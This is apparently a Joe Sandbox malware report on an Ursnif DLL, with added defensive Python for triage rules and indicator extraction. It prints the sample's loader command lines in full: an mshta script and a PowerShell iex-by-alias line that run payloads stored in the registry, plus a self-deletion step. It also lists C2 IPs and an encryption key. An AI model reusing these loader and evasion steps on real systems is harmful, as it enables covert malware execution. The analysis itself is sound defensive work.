Windows Analysis Report
VoevdOQpeU.dll
Overview
General Information
Detection
Ursnif
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1428) cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938
- cmd.exe (PID: 1796) cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D
- rundll32.exe (PID: 5292) cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D
- control.exe (PID: 6956) cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F
- rundll32.exe (PID: 7132) cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A
- WerFault.exe (PID: 3084) cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B
- WerFault.exe (PID: 5640) cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B
- WerFault.exe (PID: 4144) cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B
- mshta.exe (PID: 6532) cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB
- powershell.exe (PID: 6612) cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913
- conhost.exe (PID: 6644) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496
- csc.exe (PID: 6788) cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D
- cvtres.exe (PID: 6804) cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D
- csc.exe (PID: 6844) cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D
- cvtres.exe (PID: 6920) cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D
- explorer.exe (PID: 3616) cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D
- cmd.exe (PID: 4432) cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F
- conhost.exe (PID: 5764) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496
- PING.EXE (PID: 5388) cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B
- cleanup
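The chain in the process list (rundll32 calling the sample's export by ordinal, mshta evaluating a script it reads back from the registry, PowerShell aliasing iex and feeding it another registry value, and a ping-then-del cleanup of the DLL) is what several of the Sigma hits in the signature list fire on. As an added example that is not code from the Joe Sandbox report, here is a small triage pass over process-creation events constructed from the report's own PIDs, image names and command lines. Parent PIDs are an assumption: the flattened report does not preserve the tree, so they are set to the parents the command lines imply (mshta spawning powershell, cmd spawning ping).

```python
"""Triage rules for the Ursnif process chain listed in this report.

Added example; not code from the Joe Sandbox report. EVENTS is constructed
from the report's process list. Parent PIDs are an assumption (the flattened
report does not preserve the tree).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int          # assumed parent, see module docstring
    image: str
    cmdline: str


# Constructed from the report's process list; command lines copied as printed there.
EVENTS = [
    ProcEvent(1796, 1428, "cmd.exe",
              r'''cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1'''),
    ProcEvent(5292, 1796, "rundll32.exe",
              r'''rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1'''),
    ProcEvent(6532, 3616, "mshta.exe",
              r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    ProcEvent(6612, 6532, "powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    ProcEvent(4432, 3616, "cmd.exe",
              r'''C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll'''),
    ProcEvent(5388, 4432, "PING.EXE", "ping localhost -n 5"),
]

# rundll32 <dll>,#<n>: export called by ordinal (cf. "Sigma detected: Suspicious Call by Ordinal")
ORDINAL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?[^",]+\.dll"?\s*,\s*#\d+', re.I)
# new-alias -name <alias> -value <target>; captures PowerShell alias definitions
ALIAS_RE = re.compile(r'new-alias\s+-name\s+(\S+)\s+-value\s+(\S+?)\s*;', re.I)
EVAL_CMDLETS = {"iex", "invoke-expression"}
# ping <host> -n <N> && del ...: sleep-by-ping followed by deletion
PING_DEL_RE = re.compile(r'ping\s+\S+\s+-n\s+\d+\s*&&\s*del\s', re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def aliased_eval(cmdline):
    """Return the alias name if the command line aliases iex and later calls that alias."""
    low = cmdline.lower()
    for m in ALIAS_RE.finditer(low):
        name, target = m.group(1), m.group(2)
        if target in EVAL_CMDLETS and re.search(r"\b" + re.escape(name) + r"\b", low[m.end():]):
            return name
    return None


def triage(events):
    """Run the rules over process-creation events; return (pid, finding) pairs."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = e.image.lower()
        parent = by_pid.get(e.ppid)
        if img == "rundll32.exe" and ORDINAL_RE.search(e.cmdline):
            findings.append((e.pid, "rundll32 export called by ordinal"))
        if img == "mshta.exe" and "regread(" in e.cmdline.lower():
            findings.append((e.pid, "mshta evaluates script read from the registry"))
        if parent and parent.image.lower() == "mshta.exe" and img in SHELLS:
            findings.append((e.pid, "mshta spawned a shell"))
        if img == "powershell.exe":
            alias = aliased_eval(e.cmdline)
            if alias:
                findings.append((e.pid, f"alias {alias} for iex defined and invoked"))
        if img == "cmd.exe" and PING_DEL_RE.search(e.cmdline):
            findings.append((e.pid, "ping delay followed by del (self-deletion)"))
    return findings


if __name__ == "__main__":
    for pid, what in triage(EVENTS):
        print(f"PID {pid}: {what}")
```

The alias rule is the one worth keeping: a plain `iex` match misses this sample because the cmdlet is only ever reached through `kiubrmsyn`, so the check resolves alias definitions first and only fires when an alias for an evaluation cmdlet is actually invoked later in the same command line.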
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
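The configuration block above is what an analyst turns into indicators. The following is an added example, not the report's or the extractor's code: it pairs each hostname in c2_domain with the IP that follows it (an assumed layout; the report does not state it), validates those IPs, collects the timer fields, and checks that serpent_key has a valid Serpent key length. Note that config.edge.skype.com is a legitimate Microsoft hostname, so the actionable indicators are the three IPs; the report's 50 "TCP traffic detected without corresponding DNS query" rows are consistent with the bot connecting to them directly.

```python
"""IOC extraction from the Ursnif configuration printed in this report.

Added example, not part of the Joe Sandbox report or its config extractor.
CONFIG copies the fields used from that configuration (RSA key and other
fields omitted). Assumptions: c2_domain alternates hostname, IPv4 address;
serpent_key is the raw Serpent key.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Copied from the configuration block in this report (subset of fields).
CONFIG = {
    "c2_domain": ["config.edge.skype.com", "67.43.234.14",
                  "config.edge.skype.com", "67.43.234.37",
                  "config.edge.skype.com", "67.43.234.47"],
    "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"],
    "serpent_key": "Q8tR9QJN7lLzOLle",
    "botnet": "999",
    "server": "50",
    "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60",
    "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60",
    "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
    "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60",
    "not_use(CRC_BCTIMEOUT)": "10",
}

TIMER_KEY_RE = re.compile(r"\((CRC_\w+)\)$")


def split_c2_pairs(entries):
    """Pair every hostname with the IP that follows it (assumed layout).

    Every second entry must parse as an IP address; anything else means the
    layout assumption does not hold for this config, so stop instead of
    emitting mis-paired indicators.
    """
    if len(entries) % 2:
        raise ValueError("c2_domain does not alternate host, ip")
    pairs = []
    for host, ip in zip(entries[::2], entries[1::2]):
        pairs.append((host, str(ipaddress.ip_address(ip))))
    return pairs


def extract_iocs(cfg):
    """Return the network indicators and timers a hunter pulls from the config."""
    pairs = split_c2_pairs(cfg["c2_domain"])
    key = cfg["serpent_key"].encode("ascii")
    if len(key) not in (16, 24, 32):            # Serpent accepts 128/192/256-bit keys
        raise ValueError(f"unexpected Serpent key length {len(key)}")
    timers = {}
    for k, v in cfg.items():
        m = TIMER_KEY_RE.search(k)
        if m:
            timers[m.group(1)] = int(v)
    return {
        "c2_pairs": pairs,
        "c2_hosts": sorted({h for h, _ in pairs}),
        "c2_ips": sorted({ip for _, ip in pairs}, key=ipaddress.ip_address),
        "ip_check_hosts": [urlsplit(u).hostname for u in cfg["ip_check_url"]],
        "serpent_key_bits": len(key) * 8,
        "botnet": cfg["botnet"],
        "timers": timers,
    }


if __name__ == "__main__":
    for k, v in extract_iocs(CONFIG).items():
        print(f"{k}: {v}")
```

The ip_check hosts (ipinfo.io, curlmyip.net) are public services and are listed separately so they can be used for correlation rather than blocking.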
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
Collapsed in the original report: 15 entries. The Source column (memory dump and file identifiers) was not preserved in this extraction.

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
Collapsed in the original report: 2 entries.
System Summary: Sigma rule matches (rule titles were not preserved in this extraction) | Rules |
---|---|
Florian Roth | 4 |
frack113 | 2 |
Nikita Nazarov, oscd.community | 1 |
Perez Diego (@darkquassar), oscd.community | 1 |
Michael Haag | 1 |
juju4, Jonhnathan Ribeiro, oscd.community | 1 |
Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | 1 |
Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | 1 |
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|
04/23/22-08:11:59.593120 | 2033203 | 49760 | 80 | TCP | A Network Trojan was detected |
04/23/22-08:12:19.910177 | 2033203 | 49766 | 80 | TCP | A Network Trojan was detected |
04/23/22-08:12:20.776897 | 2033203 | 49766 | 80 | TCP | A Network Trojan was detected |
04/23/22-08:12:21.823792 | 2033203 | 49766 | 80 | TCP | A Network Trojan was detected |
All four alerts are the same rule (SID 2033203, in the Emerging Threats SID range) on plain HTTP to port 80; the last three share source port 49766, i.e. they were raised on one TCP connection.
Behavior signatures. In the sections that follow, the per-row details of the original report (file names, addresses, command lines, URLs) were not preserved in this extraction; only the evidence type of each row and the number of such rows survive.

AV Detection | Rows |
---|---|
Malware Configuration Extractor | 1 |
ReversingLabs | 1 |
Joe Sandbox ML | 1 |
Static PE information | 1 |
Binary string | 3 |
Code function | 5 |
Networking | Rows |
---|---|
Snort IDS | 4 |
Network Connect | 1 |
Process created | 1 |
ASN Name | 1 |
IP Address | 1 |
HTTP traffic detected | 6 |
TCP traffic detected without corresponding DNS query | 50 |
String found in binary or memory | 3 |
Code function | 1 |
Key, Mouse, Clipboard, Microphone and Screen Capturing | Rows |
---|---|
File source | 27 |
E-Banking Fraud | Rows |
---|---|
File source | 27 |
Code function | 1 |
System Summary | Rows |
---|---|
WMI Registry write | 8 |
Static PE information | 6 |
Process created | 35 |
Code function | 39 |
Binary or memory string | 1 |
Key opened | 3 |
ReversingLabs | 1 |
Key value queried | 1 |
File created | 4 |
Classification label | 1 |
File read | 7 |
Section loaded | 7 |
Mutant created | 5 |
Window detected | 1 |
File opened | 1 |
Binary string | 3 |
Hooking and other Techniques for Hiding and Protection | Rows |
---|---|
File source | 27 |
Process created | 2 |
Registry key monitored for changes | 1 |
Process information set | 155 |
Malware Analysis System Evasion | Rows |
---|---|
Process created | 2 |
Thread sleep time | 1 |
Evasive API call chain | 1 |
Last function | 1 |
Dropped PE file which has not been started | 2 |
Thread delayed | 2 |
Window / User API | 2 |
Check user administrative privileges | 1 |
Process information queried | 1 |
Code function | 6 |
Binary or memory string | 12 |
Process token adjusted | 1 |
Process queried | 2 |
HIPS / PFW / Operating System Protection Evasion | Rows |
---|---|
Network Connect | 1 |
Memory written | 5 |
Thread created | 1 |
Process created | 12 |
Binary or memory string | 4 |
Queries volume information | 10 |
Code function | 5 |
Key value queried | 1 |
Stealing of Sensitive Information | Rows |
---|---|
File source | 27 |
Remote Access Functionality | Rows |
---|---|
File source | 27 |
MITRE ATT&CK tactic | Techniques (number of matching signatures) |
---|---|
Initial Access | Valid Accounts (1) |
Execution | Windows Management Instrumentation (1), Native API (3), Command and Scripting Interpreter (1) |
Persistence | Valid Accounts (1) |
Privilege Escalation | Valid Accounts (1), Access Token Manipulation (1), Process Injection (413) |
Defense Evasion | Obfuscated Files or Information (1), File Deletion (1), Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (31), Process Injection (413), Rundll32 (1) |
Credential Access | none in the preserved rows |
Discovery | System Time Discovery (1), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (25), Query Registry (1), Security Software Discovery (11), Virtualization/Sandbox Evasion (31), Process Discovery (3), Application Window Discovery (1) |
Lateral Movement | none in the preserved rows |
Collection | Archive Collected Data (11), Email Collection (1) |
Exfiltration | none in the preserved rows |
Command and Control | Ingress Tool Transfer (2), Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (11) |
Impact | Data Encrypted for Impact (1) |
Only techniques with at least one matching signature are listed. The original matrix also shows every unmatched technique as filler, including the mobile-only Network Effects and Remote Service Effects columns, and is cut off after its ninth row in this extraction.
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
38% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | | unknown | |
true | | unknown | |
true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | | low | ||
false | | unknown | ||
false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 614287 |
Start date and time: | 2022-04-23 08:10:43 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | VoevdOQpeU.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 43 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.evad.winDLL@29/23@0/2 |
EGA Information: | |
HDC Information: | |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed functions
- Not all processes were analyzed; the report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
08:11:55 | API Interceptor | |
08:12:10 | API Interceptor | |
08:12:34 | API Interceptor |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_164b3f26\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8484271078729315 |
Encrypted: | false |
SSDEEP: | 96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW |
MD5: | AC7F4345BC16B046B4BD7A4B49FAD9DE |
SHA1: | 31DB96A77E8C9352345D2D35BDD922C5A989733E |
SHA-256: | 0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A |
SHA-512: | F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5f68951fc85ec886a9cff2e6302d69913a8368e_7cac0383_107353c7\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8450263074663521 |
Encrypted: | false |
SSDEEP: | 96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW |
MD5: | E3453784F5987FFC4297D68B3E5806EC |
SHA1: | 8AE5D7F0D9E1EDD426FD57793895BF06C7D55090 |
SHA-256: | A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC |
SHA-512: | FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 39506 |
Entropy (8bit): | 2.072438553320638 |
Encrypted: | false |
SSDEEP: | 192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK |
MD5: | C917F1742DC83F5A043197F2F54A0C4E |
SHA1: | AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF |
SHA-256: | 142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889 |
SHA-512: | 61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8340 |
Entropy (8bit): | 3.69846117157985 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy |
MD5: | 03FE517493CDA2DA9A9CB5CF3B51E3C8 |
SHA1: | 6DAA111381E6A2BA15D14F385ECD9EE1E680EE70 |
SHA-256: | 088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988 |
SHA-512: | 2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.468439994201981 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd |
MD5: | 1F581D2D671323001820EEC345955E8D |
SHA1: | 84D57DE07A1A92920A775FD9A2EF441FD6D55EDC |
SHA-256: | F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1 |
SHA-512: | E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 36062 |
Entropy (8bit): | 1.9519178024623962 |
Encrypted: | false |
SSDEEP: | 192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX |
MD5: | B26D761700EC27A85A7E8306F7D9C1CD |
SHA1: | 26BA946FC504E3B720545A54C6166E6A2841B1FC |
SHA-256: | A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72 |
SHA-512: | 3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8300 |
Entropy (8bit): | 3.69036741286865 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe |
MD5: | C80DFEB2FD09E96D80A105BF1416186F |
SHA1: | C2E029A858E8ED96BB46CEB163704C526428BB15 |
SHA-256: | B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F |
